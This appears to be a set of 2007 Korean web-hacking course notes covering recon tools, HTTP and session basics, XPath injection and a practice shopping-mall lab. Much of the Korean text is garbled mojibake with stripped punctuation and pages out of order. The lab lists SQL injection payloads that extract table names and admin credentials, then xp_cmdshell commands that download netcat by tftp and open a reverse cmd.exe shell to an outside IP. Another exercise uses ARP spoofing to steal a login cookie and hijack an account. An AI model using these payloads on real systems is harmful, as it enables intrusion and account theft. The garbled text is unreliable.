ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
QUERY_STRING REMOTE_ADDR
SERVER_PORT HTTP_USER_AGENT
REQUEST_METHOD
CONTENT_TYPE
CONTENT_LENGTH
HTTP
HTTP(HYPERTEXT TRANSFER PROTOCOL)
-TCP ๊ธฐ๋ฐ์ ํ๋กํ ์ฝ
-REQUEST ์ RESPONSE์ ๊ตฌ์กฐ๋ก ๋์ด ์์
-STATELESS ํ ํ๋กํ ์ฝ(REQUEST ์ RESPONSE๊ฐ ์ด๋ฃจ์ด์ง๋ฉด ์ ์์ด ์ข ๋ฃ๋จ (HTTP10)
๊ธฐ๋ณธ์ฉ์ด
URI (Uniform Resource Idenifier)
-์ธํฐ๋ท ์์ ์์์ ์๋ณํ๊ธฐ ์ํ ๋ฌธ์์ด
URL(Uniform Resource Locator)
-์์์ ์์น ์ ๋ณด๊ฐ ์ค์
-httpwwwsitecomsearchasp
URL(Uniform Resource Name)
-์์์ ์์น์ ์๊ด์์ด ์์ฒด์ ์ ๋ณด๊ฐ ์ค์ํ๋ค
-urnisbn021702452
HTTP ํ๋กํ ์ฝ ํต์ ๋ฐฉ์
HTTPResposeHeader
HTTPRequestHeader
HTTP 10
ํ๋์ ๋ฌธ์์ ๊ทธ๋ฆผ์ด ํ๋ ์๋๋ผ๋ ์ต์ด ํ ์คํธ๊ฐ ์ ์ฅ๋ HTTP ๋ฌธ์๋ฅผ ์ ์ก๋ฐ๊ณ ๋ ๋ค ์ฐ๊ฒฐ์ ๋๊ณ ๊ทธ๋ฆผ์
๋ฐ๊ธฐ ์ํด ๋ค์ ์ฐ๊ฒฐ์ ์ค์ ํ ํ ๊ทธ๋ฆผ์ ์ ์ก๋ฐ๋๋ค
HTTP11
์ฐ์๋ ์ฐ๊ฒฐ ์์ฒญ์ด ์์ ๊ฒฝ์ฐ์ HTML ๋ฌธ์๋ฅผ ๋ฐ๊ณ ๋ ๋ค ์ฐ๊ฒฐ์ ๋๊ณ ๋ค์ ์ฐ๊ฒฐ์ ์์ฒญํ์ง ์๊ณ ๋ฐ๋ก ๊ทธ๋ฆผ ํ์ผ
์ ์์ฒญํ๋ค
HTTP 11์ Method
Method ์ค๋ช
GET ์์์์ฒญ
POST ENTITY๋ฅผ ํฌํจํ ์์ ์์ฒญ
HEAD HTTP HEADER ์ ๋ณด๋ง ์์
TRACE Request์ ๋ฃจํ๋ฐฑ ํ ์คํธ
PUT URL์ ์์์ ์์ฑ
DELETE URL์ ์์์ ์ญ์
OPTIONS ์๋ต ๊ฐ๋ฅํ HTTP๋ฉ์๋๋ฅผ ์์ฒญ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 3
OPTIONS ์๋ต ๊ฐ๋ฅํ HTTP๋ฉ์๋๋ฅผ ์์ฒญ
CONNECT ํฐ๋๋ง์ ๋ชฉ์ ์ผ๋ก ์ฐ๊ฒฐ์์ฒญ(Proxy ์ฐ๊ฒฐ)
GETPOST ๋ฉ์๋
GET๊ณผ POST๋ ์๋ฒ์ ์์์ ์์ฒญํ๋ ์ฌ์ฉ๋จ
GET๋ฐฉ์ POST๋ฐฉ์
์๋ฒ์ ์ ๋ฌํ๊ณ ์ํ๋ ๋ฐ์ดํฐ๋ฅผ URL ์ ํฌํจ์ํด
์ ์กํ ์ ์๋ ๋ฐ์ดํฐ๋์ด ์ ํ๋จ(2K4K)
์๋ฒ์ ์ ๋ฌํ ๋ฐ์ดํฐ๋ฅผ REQUEST Body์ ํฌํจ์ํด
๋ฐ์ดํฐ ์ ์ก๋์ ์ ํ์ด ์์(์๊ฐ์ ํ๊ฐ๋ )
GET loginaspuser_id=adminampuser_pass=1234
HOSTwwwsitecom
POST loginasp HTTP11
HOSTwwwsiteorg
User_id=admin user_pass=1234
get๋ฐฉ์(์น ๋ก๊ทธ๋ 8000์ ๊น์ง๋ง ์ ์ฅํ๋ค)
HEAD ๋ฉ์๋
TRACE ๋ฉ์๋
WEBDAV ๊ด๋ ฆ๋ฉ์๋
PUT
COPY
MOVE
DELETE
MAKECOL
PUT๋ฉ์๋ ์ฌ์ฉ์์
PUT HTTPWWWKISECCOMindex11html HTTP1O
HOSTWWWKISECCOM
Content-Length30
User-AgentBlaBla Client
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 4
User-AgentBlaBla Client
HTTP RESPONSE์ ์ฃผ์ ์๋ต ์ฝ๋
์ฃผ์ ์๋ต์ฝ๋
200 OK 400 BadRequest
201 Created 401 Unauthorized
202 Accepted 403 Forbidden
404 Not Found 301 Moved permanently
302 Found 500 Internal Server Error
HTTP ๊ด๋ ฆ ๊ธฐ์
์ฟ ํค
94๋ ๋ท์ค์ผ์ดํ์์ ๊ฐ๋ฐ
์๋ฒ๊ฐ ์์ฑํ๊ณ ํด๋ผ์ด์ถํธ์ ์ ์ฅ์ํค๋ ๋ฐฉ์
์ ์ฅ์๊ตฌ์ (Persistent๋์คํฌ)๋ฐ์๊ตฌ์ (Non-Persistent ๋ฉ๋ชจ๋ฆฌ)
๋ณด์๋ณด์๋น๋ณด์
์ ํํฌ๊ธฐ์ ํ(4k)๋ณ์์ ํ(2k)
ํ๋ฒ ์ ์ฅ๋ ์ฟ ํค๋ ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ์ด ์ง๋์ง ์๋ ํ ํด๋น ๋๋ฉ์ธ์ ์ ์์ ๋ธ๋ผ์ฐ์ ๊ฐ ์๋์ผ๋ก ํ์ฌํ์ฌ ์ ์ก
ํ๊ฒ ๋จ
์ฟ ํคํ์ผํํ์ฌ์ฉ์์ด๋ฆ์ ์ํ์ฌ์ดํธ
์ฟ ํคํ์ผ๋ด์ฉ๊ฐ๋ฐ์๊ฐ ์ค์ ํ๊ธฐ ๋๋ฆ
๋ํดํธ ๋๋ ํ ๋ฆฌ CDocuments and Setting์ฌ์ฉ์์ด๋ฆCookies
๊ธฐ๋ณธํฌ๋งท
Set-cookie
Name=value ์ฟ ํค์ ์ด๋ฆ
Expire=date ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ
Domain=domain ๋๋ฉ์ธ
Path=path ์ฟ ํค๋ฅผ ์ด์ฉํ์ฌ ์ ์์ฌ๋ฅํ URL
Secure ๋ณด์๋น๋ณด์์ค์
๊ด๋ ฆ ISSUE
์ฌ์ฉ์ ์์์กฐ์ ๋ฐ ์ค๋ํ ํ๋ก์ ๋ฑ์ ํตํ ๋ณ์กฐ๊ฐ๋ฅ
XSS๋ฑ์ ํตํ ํ์ธ์ ์ฟ ํคํ์ทจ
์ฌ์๊ณต๊ฒฉ์ ๋ฌด๋ฐฉ๋น
๋์๋ฐฉ์ ์ฟ ํค๋ ์ฌ์ฉํ์ง ์๋๋ค๋ ๊ธฐ๋ณธ ์ฒ ์น ์ฌ์ฉํ ๊ฒฝ์ฐ ๊ฒ์ฆ๋ ์ํธํ ์๊ณ ๋ฆฌ์ฆ์ผ๋ก ์ต์ํ์ ์ ๋ณด๋ง
์ ์ฅ ์ฟ ํค์ ๋ฌด๊ฒฝ์ค ๊ฒ์ฌ๋ฅผ ์ํด ์ ์ก๋๋(ํน์ ๋ณ์ ๊ฐ+TimeStamp)๋ฑ์ ์ ๋ณด๋ฅผ ํด์ํ ๊ฐ๊น์ง ๊ฐ์ด
์ ์ก ์๋ฒฝํ์ง ์์ผ๋ ์ธ์ ๊ณผ ๊ฐ์ด ๋ณํ์ ๋ณด์์ฑ ํฅ์
์ธ์ (SESSION)
HTTP์ ์ ์ธ์ ์ ๋ํ ์ฒ๋ฆฌ๋ฅผ ๋ด๋นํ๋ ๊ธฐ์
Server Side ๊ธฐ์ ๋ก HTTP์ Stateless ํ ํน์ฑ์ ๋ณด์ํ๊ธฐ ์ํด Uniq ํ ID๋ฅผ ์์ฑํ์ฌ ํ์ฌ ์ ์ํ ํด๋ผ์ด์ถํธ์๊ฒ
ํ๋นํด์ฃผ๊ณ ๊ธฐ์ตํ๋ ๋ฐฉ์
๊ณผ๊ฑฐ cookie์ ์ ์ฅํ๋ ๋ณ์ ๊ฐ ์ ์ด๊ธฐ ์ ์ ์ ํ๋นํ๊ฒ ๋จ
ํ๋นํ ๋ณ์๋ ์๋ฒ์ ์ ์ฅ๋๋ฉฐ ํด๋ผ์ด์ถํธ ์ธก ์๋ ์ธ์ ID๋ง ๋ถ์ฌ๋จ
์ฃผ๋ก Web Application Server ๋ Web Server ๋ฅผ ํ๋น ๋ฐ์ผ๋ฉฐ ์ด๋ ํด๋น ID์ ํน์ ์ ๋ณด๋ฅผ ์ ์ฅํ ์ ์์
ํด๋ผ์ด์ถํธ๋ ์๋ฒ์ ํต์์ SESSION ID๋ง ์ฃผ๊ณ ๋ฐ์
์ธ์ ID
WASWS ์ธ์ ID๋ณ์
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 5
IIS ASPSESSIONID
APACHE SESSIONID
TOMCAT JSESSIONID
PHP PHPSESSID
๊ธฐํ JServerSessionID
JWSESSIONID
SESSID
SESSION
SID
SESSION_ID
์ธ์
WASWS ๋ง๋ค ๋ค๋ฅด์ง๋ง ๋ณดํต 10๋ถ20๋ถ ์ค์ ์
์ฌ์ฉ์๊ฐ ๋น์ ์ ๋ก๊ทธ์์ ํ๊ฑฐ๋ Request ์์ฒญ ์์ ์ ์ ํ์ ์์ ๊ฐ ์ด๊ณผ ํ ํด๋น ์ธ์ ID๋ ์๋ฉธ
์ธ์ ๋ ์ฟ ํค์ ๊ฐ์ ์ ํจ๊ธฐ๊ฐ ์์
๊ด๋ ฆ ISSUE
์ด๊ธฐ์ธ์ ๊ฐ์ฒด ์์ฑ์ ํด๋ผ์ด์ถํธ์ IP ๋ฉ์ธ๋ณด๋SN ํ๋๋์คํฌ SN๋ฑ Uniq ํ ๊ฐ์ ์ค์ ํ ํ ๋งค ํ์ด์ง๋ง๋ค
์ธ์ฆ๋น๊ต๋ฅผ ํตํด ๊ณต๊ฒฉ์ ์๋ฐฉํ ์ ์์
์ฌ์ฉ์ ์์์กฐ์์ ํตํ ๊ณต๊ฒฉ์๋
์ธ์ ์ด๊ธฐ ์์ฑ์๋ง๋ค ์๋ก์ด ID๋ฅผ ์์ฑ
์ฌ์๊ณต๊ฒฉ
์ค์ต
Cookie๊ฐ์ ์ค๋ํ ํด์ ์๋๋ฐฉ Cookie๊ฐ์ผ๋ก ์๋๋ฐฉ ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
์ค์ตํ๊ฒฝWinArpSpoof or CainampAbel or wireshark
Wireshark๋ก arp ์คํธํ์ ํด์ ํจํท์ด ๋์๊ฒ ๋๊ฒจ์ค๊ฒ ๋ง๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 6
ํ๋ฉด๊ณผ ๊ฐ์ด wireshark๋ฅผ ์ค๋นํ๋ค
์คํธํ์ ํ๊ณ ์์ผ๋ฉด ์๋๋ฐฉ ์ธก์์ wwwnavercom ์ ๋ก๊ทธ์ธ์ ํ๊ฒ ๋๋ฉด ํจํท์ด ๋ ๋ผ ์ค๊ฒ ๋๋ค ์ฌ๊ธฐ์ ์ฐ๋ฆฌ๋
๋ก๊ทธ์ธ ๊ด๋ ฆ ํจํท ๋ง ์์๋ณด๊ธฐ ์ํด ํํฐ์ httprequestmethod == POST ๋ฅผ ์น๋ค
๋ค์๊ณผ ๊ฐ์ด ๋์ฌ ๊ฒ์ด๋ค Set-Cookie๋ถ๋ถ์ ๋ณต์ฌํด ๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 7
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
